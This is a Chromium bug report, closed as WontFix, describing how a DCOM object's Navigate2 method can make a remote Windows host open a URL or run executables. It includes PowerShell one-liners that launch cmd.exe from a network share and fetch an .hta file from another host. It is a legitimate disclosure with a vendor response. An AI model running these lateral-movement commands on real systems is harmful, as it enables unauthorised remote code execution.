New issue
Advanced search Search tips

Issue 867401 link

Starred by 1 user
Status: WontFix
Owner: ----
Closed: Jul 25
EstimatedDays: ----
NextAction: ----
OS: ----
Pri: ----
Type: Bug-Security



Sign in to add a comment

Security: Chrome Navigate2 CLSID Lateral Vector

Reported by thruc...@gmail.com, Jul 25 
VULNERABILITY DETAILS
If an attacker has the necessary credentials, it is possible to cause the browser (CHROME, if the default is CHROME) on a remote machine to visit a site of the attackers choice, or run a local executable (or run a unc path exe, however a consent window needs to be agreed to)  

This may get a 'functions as designed' response, or 'that is a windows issue'. likely both. Anyway. Its another way to rick roll, if nothing else. 

VERSION


Google Chrome	67.0.3396.99 (Official Build) (64-bit) (cohort: Stable)
Revision	a337fbf3c2ab8ebc6b64b0bfdce73a20e2e2252b-refs/branch-heads/3396@{#790}

[System.Environment]::OSVersion.Version

Major  Minor  Build  Revision
-----  -----  -----  --------
10     0      16299  0


REPRODUCTION CASE 

*Valid credentials on the (remote) host are necessary.*

~run a remotely sourced binary (\\aremoteshare\\cmd.exe) on a remote host (10.0.0.1). A popup must be clicked through. Works best with an IP, and not a hostname.  

[System.Activator]::CreateInstance([Type]::GetTypeFromCLSID("{c08afd90-f2a1-11d1-8455-00a0c91f3880}","10.0.0.1")).Navigate2("\\10.0.0.2\Users\share\cmd.exe")

If The exe is local, this is not necessary.

[System.Activator]::CreateInstance([Type]::GetTypeFromCLSID("{c08afd90-f2a1-11d1-8455-00a0c91f3880}","10.0.0.1")).Navigate2("c:\windows\system32\cmd.exe")

If a 'handled' file extension is specified (for example .hta) the file is automatically saved locally. It can then be run with a follow up command. this however still requires the user to clock through. 

PS C:\Users\ph> [System.Activator]::CreateInstance([Type]::GetTypeFromCLSID("{c08afd90-f2a1-11d1-8455-00a0c91f3880}","10.0.0.1")).Navigate2("http://10.0.0.2:8000/msgbox.hta")

PS C:\Users\ph> [System.Activator]::CreateInstance([Type]::GetTypeFromCLSID("{c08afd90-f2a1-11d1-8455-00a0c91f3880}","10.0.0.1")).Navigate2("c:\users\x\Downloads\msgbox.hta")


And of course, you can send them to browse anywhere;

~Rickroll you friends :)
[System.Activator]::CreateInstance([Type]::GetTypeFromCLSID("{c08afd90-f2a1-11d1-8455-00a0c91f3880}","10.0.0.1")).Navigate2("https://www.youtube.com/watch?v=dQw4w9WgXcQ")

THE FACT THIS REQUIRES CREDS MAY UNDERMINE EVERYTHING. However it does feel slightly like the whole CLSID Excel||onenote.Appliction.DDEinitiate thing;

hxxps[:]//enigma0x3.net/2017/09/11/lateral-movement-using-excel-application-and-dcom/

Comment 1 by mbarbe...@chromium.org, Jul 25

Status: WontFix (was: Unconfirmed)
Thanks for the report! As you suspected, there's not much that chrome can do in this case. See https://chromium.googlesource.com/chromium/src/+/master/docs/security/faq.md#Why-arent-physically_local-attacks-in-Chromes-threat-model for more information.
Project Member

Comment 2 by sheriffbot@chromium.org, Nov 1

Labels: -Restrict-View-SecurityTeam allpublic
This bug has been closed for more than 14 weeks. Removing security view restrictions.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot

Sign in to add a comment